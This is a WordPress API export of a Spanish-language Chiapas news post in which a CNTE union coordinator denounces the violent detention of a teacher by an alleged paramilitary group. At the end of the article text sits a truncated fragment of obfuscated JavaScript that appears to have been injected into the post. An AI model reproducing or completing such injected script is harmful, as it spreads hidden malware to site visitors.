{"id":517,"date":"2022-03-12T02:39:36","date_gmt":"2022-03-12T02:39:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=517"},"modified":"2022-03-12T02:39:37","modified_gmt":"2022-03-12T02:39:37","slug":"denuncian-represion-contra-la-cnte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=517","title":{"rendered":"Denuncian represi\u00f3n contra la CNTE"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-11.40.23-AM-1024x576.jpeg\" alt=\"\" class=\"wp-image-518\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-11.40.23-AM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-11.40.23-AM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-11.40.23-AM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-11.40.23-AM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-11-at-11.40.23-AM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>11 de Marzo del 2022. San Crist\u00f3bal de las Casas.- Sergio G\u00f3mez Mart\u00ednez, Coordinador en la Regi\u00f3n altos del Nivel de Educaci\u00f3n Ind\u00edgena (NEI) de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE) denunci\u00f3 la detenci\u00f3n de su compa\u00f1ero Juan Manuel P\u00e9rez L\u00f3pez de la Asamblea Estatal Democr\u00e1tica 40, por sujetos con corte paramilitar.<\/p>\n\n\n\n<p>En conferencia de prensa, acompa\u00f1ado de los miembros del NEI, explic\u00f3 que el hecho se dio el pasado jueves, alrededor de las 9 de la ma\u00f1ana \u201cpor un grupo de corte paramilitar provenientes de la comunidad Rub\u00e9n Jaramillo del municipio de Jitotol\u201d.<\/p>\n\n\n\n<p>Indic\u00f3 que Juan Manuel fue bajado de su autom\u00f3vil con lujo de violencia, \u201dle rompieron los cristales, le poncharon las llantas y quitaron celulares para evitar se comunicara, gracias a la difusi\u00f3n que hicieron sobre su desaparici\u00f3n el&nbsp; d\u00eda de hoy les avisaron que ya&nbsp; est\u00e1 libre\u201d, pero a\u00fan desconocen su estado de salud.<\/p>\n\n\n\n<p>\u201cEl compa\u00f1ero sabemos que desde hace varios a\u00f1os ha venido siendo hostigado por parte de la fiscal\u00eda, ha recibido amenazas y \u00f3rdenes de aprehensi\u00f3n sin embargo no se hab\u00edan ejecutado, quienes lo ejecutaron ayer es un grupo a fin del gobierno, un grupo paramilitar del cual exigimos su desactivaci\u00f3n\u201d, indic\u00f3 G\u00f3mez Mart\u00ednez.<\/p>\n\n\n\n<p>Consider\u00f3 que la ola de represi\u00f3n en contra de los Maestros democr\u00e1ticos,&nbsp; se debe al relevo seccional del cual debe salir la convocatoria este mes de marzo, y tal es el caso que el pasado 9 de febrero, detuvieron al maestro Manuel de Jes\u00fas Mendoza V\u00e1zquez del NEI, por una supuesta demanda que no existi\u00f3 \u201cy que estaba encarpetada, porque la misma reportera que hizo la denuncia, F\u00e1tima Monterrosa, ella nos inform\u00f3 que hab\u00eda otorgado el perd\u00f3n, que se hab\u00eda encarpetado, pero hay un inter\u00e9s de la propia fiscal\u00eda\u201d.Zona de los archivos adjuntos<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 11 de Marzo del 2022. San Crist\u00f3bal de las Casas.- Sergio G\u00f3mez Mart\u00ednez, Coordinador en la Regi\u00f3n altos del Nivel de Educaci\u00f3n Ind\u00edgena (NEI) de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE) denunci\u00f3 la detenci\u00f3n de su compa\u00f1ero Juan Manuel P\u00e9rez L\u00f3pez de la Asamblea Estatal Democr\u00e1tica 40, por sujetos con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":518,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-517","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=517"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/517\/revisions"}],"predecessor-version":[{"id":519,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/517\/revisions\/519"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/518"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}